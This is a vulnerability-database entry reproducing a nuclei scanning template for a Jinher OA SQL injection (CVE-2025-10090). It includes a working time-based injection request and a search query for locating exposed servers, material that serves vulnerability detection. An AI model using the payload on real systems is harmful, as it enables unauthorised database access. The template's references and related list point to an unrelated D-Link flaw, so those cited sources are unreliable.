Jinher OA - SQL Injection

05 Jul 2026 03:01:21 | Reported by ProjectDiscovery | Type: nuclei | github.com | 20 views

Jinher OA SQL injection allows remote SQL execution, risking data theft; update to latest version.

Related

Reporter | Title | Published | Family
Circl | CVE-2025-10090 | 8 Sep 2025 13:20 | circl
Circl | CVE-2025-14528 | 11 Dec 2025 17:39 | circl
CNNVD | Jinher OA SQL injection vulnerability | 8 Sep 2025 00:00 | cnnvd
CNNVD | D-Link DIR-803 security vulnerability | 11 Dec 2025 00:00 | cnnvd
CNVD | D-Link DIR-803 Information Disclosure Vulnerability | 18 Dec 2025 00:00 | cnvd
CVE | CVE-2025-10090 | 8 Sep 2025 09:32 | cve
CVE | CVE-2025-14528 | 11 Dec 2025 17:02 | cve
Cvelist | CVE-2025-10090 Jinher OA GetTreeDate.aspx sql injection | 8 Sep 2025 09:32 | cvelist
Cvelist | CVE-2025-14528 D-Link DIR-803 Configuration getcfg.php information disclosure | 11 Dec 2025 17:02 | cvelist
EUVD | EUVD-2025-202757 | 11 Dec 2025 17:02 | euvd

id: CVE-2025-10090

info:
  name: Jinher OA - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    jinher jinher_oa is an office automation software that facilitates workflow management and collaboration within organizations. It sits in the enterprise layer of the tech stack, is typically deployed as self_hosted, and—within the information_technology industry—serves the business_apps domain.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or database compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
    - https://vuldb.com/?id.335869
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-10090
    epss-score: 0.01664
    epss-percentile: 0.73869
    cwe-id: CWE-74,CWE-89
  metadata:
    max-request: 1
    verified: true
    vendor: jinher
    fofa-query: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
  tags: cve,cve2025,time-based,sqli,jc6,jinher,vkev

http:
  - raw:
      - |
        @timeout 10s
        GET /C6/Jhsoft.Web.departments/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id", "permissions")'
        condition: and
# digest: 4a0a00473045022100c130f7dcd45a15782e712d4cdc7f2b6c08f5c742f95861bba1bb2c2c1ab0db0502203aa233f22f5a41516eb44bbd27a0adc89dfd8bfe43353ceb2370995a80867201:922c64590222798bb761d5b6d8e72950


10 Feb 2026 14:14 (current)
6.5 Medium risk
Vulners AI Score: 6.5
CVSS 3.1: 7.3 - 9.8
CVSS 4: 6.9
CVSS 2: 7.5
CVSS 3: 7.3
EPSS: 0.03559